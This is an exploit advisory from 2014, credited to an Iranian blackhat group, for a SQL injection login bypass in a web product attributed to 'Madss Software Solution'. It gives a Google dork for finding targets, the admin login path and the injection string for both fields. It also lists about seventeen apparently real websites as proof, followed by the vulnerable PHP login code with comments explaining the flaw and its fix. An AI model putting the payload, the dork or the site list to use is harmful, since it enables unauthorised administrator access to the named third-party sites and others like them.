`#########################################
# Exploit Title : Developed by Madss Software Solution Login page Bypass Vulnerability
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://madsssoftwaresolution.com
#
# Tested on: Windows 7 , Linux
#
# Google Dork : intext:"Developed by Madss Software Solution Pvt. Ltd."
#
# Date: 2014/4/13
#
###########################################
#
# Exploit : Login page bypass
#
# Location : [Target]/admin/login.php
#
# Username : '=' 'or'
#
# Password : '=' 'or'
######################
# Proof:
#
# http://www.artistmahendradubey.com/admin/login.php
#
# http://www.sardarenterprises.com/admin/login.php
#
# http://www.amritaorganic.com/admin/login.php
#
# http://www.kvmcpandhana.com/admin/login.php
#
# http://www.vikatsoft.com/admin/login.php
#
# http://www.narulamathsmagic.com/admin/login.php
#
# http://www.dayodayathirthborgaon.com/admin/login.php
#
# http://www.chhatimata.com/admin/login.php
#
# http://www.chhatimata.com/admin/login.php
#
# http://www.mnlawcollegekhandwa.com/admin/login.php
#
# http://www.guptashrikhandwa.com/admin/login.php
#
# http://www.apnagwalior.com/admin/login.php
#
# http://www.apnamorena.com/admin/login.php
#
# http://www.djpsbhikangaon.com/admin/login.php
#
# http://www.acmecoachingbhikangaon.com/admin/login.php
#
# http://www.sainisportsacademy.com/admin/login.php
#
# http://www.apnaburhanpur.com/admin/login.php
#
############################################
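Vulnerable Code ([Target]/admin/login.php) : the login query is built by concatenating unescaped POST input, which is what allows the bypass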
<?php
// Page bootstrap for the admin login form: starts the session, turns off PHP
// error output and loads config.php before any HTML is sent.
session_start();
// NOTE(review): error_reporting(0) hides every PHP notice and warning on this
// page, so problems such as undefined variables never show up during testing.
// Prefer logging errors to a file with display turned off rather than
// disabling reporting entirely.
error_reporting(0);
// presumably config.php opens the MySQL connection that mysql_query() relies
// on further down; confirm against that file.
include("config.php");
// The block below is disabled by its author. When enabled it would redirect a
// visitor whose session already holds a non-empty "session_nickname" to
// admin_home.php. Note that it calls header() without a following exit.
/*if(isset($_SESSION["session_nickname"]) && $_SESSION["session_nickname"]!="")
{
header("location:admin_home.php");
}*/
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Admin Login</title>
<link href="css/login.css" rel="stylesheet" type="text/css" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head>
<body>
<br />
<a href="../xlexcicalx.php" style="margin-left:850px; color:#F00">Logout completelly</a>
<div id="logincontainer">
<h1>Administrator</h1>
<div id="loginbox">
<?php
// Login handler: runs only when the form below was submitted (POST field "submit").
if(isset($_POST['submit']))
{
// SECURITY: this statement is the flaw the advisory describes. The submitted
// username and password are concatenated straight into the SQL text with no
// escaping and no parameter binding, so quote characters in either field
// become part of the WHERE clause and the query can return rows without a
// valid password (SQL injection leading to authentication bypass).
// Remediation: pass both values as bound parameters of a prepared statement
// (mysqli or PDO). The mysql_* extension used here was removed in PHP 7.0.
// The password is compared exactly as submitted and no hashing is visible, so
// it is presumably stored in plaintext; store password_hash() output and
// check it with password_verify() instead.
// "or die(mysql_error())" prints the raw database error to the browser, which
// discloses query structure; log the error server-side and show a generic message.
$sql=mysql_query("select * from tbl_admin where username='".$_POST['username']."' and password='".$_POST['password']."' and type='admin'") or die(mysql_error());
// Any non-empty result set is accepted as a successful admin login.
if(mysql_num_rows($sql)>0)
{
// The session stores the raw submitted username, not the value from the
// matched row, so it can hold arbitrary input. Escape it wherever it is
// later printed.
// NOTE(review): no session_regenerate_id() call is visible after the login
// succeeds; adding one here protects against session fixation.
$_SESSION["session_nickname"]=$_POST['username'];
$_SESSION["type"]='admin';
// The redirect to admin_home.php is done client-side by the script tag below.
?>
<script type="text/javascript"> window.location.href="admin_home.php";</script>
<?php
}
else
{
// Generic failure text that does not say which field was wrong.
$mass="Invalid user name or password. ";
}
// $mass is assigned only on the failure path; on success the echo below reads
// an undefined variable, which error_reporting(0) silences.
?>
<tr>
<td colspan="3" align="center"><strong style="color:#FF0000"><?php echo $mass; ?></strong></td>
</tr>
<?php
}
?>
<form method="post" />
<div class="inputcontainer">
<img src="./images/icons/icon_username.png" alt="Username" />
<label for="username">Username:</label>
<input type="text" id="username" name="username" />
</div>
<div class="inputcontainer">
<img src="./images/icons/icon_locked.png" alt="Password" />
<label for="password">Password:</label>
<input type="password" id="password" name="password" />
</div>
<input type="submit" name="submit" value="Login" class="loginsubmit" />
<p><a href="forget_password.php">Forgotten password</a></p>
</form>
</div>
</div>
</body>
</html>
###################################################
Milad Hacking
We Love Mohammad
Home Page : https://www.facebook.com/milad.hacking.5
Email: milad.hacking.blackhat[at]gmail.com
Parcham balast
############################################
Special Tnx To
My Love , Iliya Norton , Unfix Blackhat , HashoR , Unline , mahdi.safavi , h00man_empire
Bahman Spy , Far Yar , Parsix , Matthew Farrell , ALi Sec , Ali Svr , Hossein Ghayoumi Zadeh , Shahram BlackHat , Saeed Nouri Massal , Hamid Reza Ashrafnia , LinX64 , Hossein Hezami , Raminramz ,Ali Reza , Saeed.0511 , Spoofer ( best Friend ) , Dr4GOn ,Alireza666 , Amirh03in , Rezahck23 , EB051 , AbolfazlKHAAN , Hacker.Ramin , b0z0rgmehr , badguy , Nc 521 , Alireza Attacker , HAMIDx9 , GNU Linux , BlackhatGH , Angel--D3m0n , B14ckc0d3r , Milad-Bushehr , F.I.G.H.T.E.R , SHD.N3T , SaiedSoft , Cyb3r_Inj3ct0r , SolD!3r , ACC3SS , Wanted2011 , CyberHacker , Hasan Speed , iman teymouri , Ba3bak , spoof , T3rm!nat0r5 , D3s!6n37 , @_HOJ@T_@ , 4rm4n , Th mAnger , FaridP30 , AMoK , Azad , The-Smith , soheil-hidd3n , blackvirus73 ,ERroR , HASSAN20 , Majidflash , R33VES , Rz04 , stealer , Dr.James , m@rte2a , Mast3r 0mid , MMA Defacer , MR.Moein , Mr.PERSIA , Red line
############################################
Never Forget My Top Friends <3
############################################
`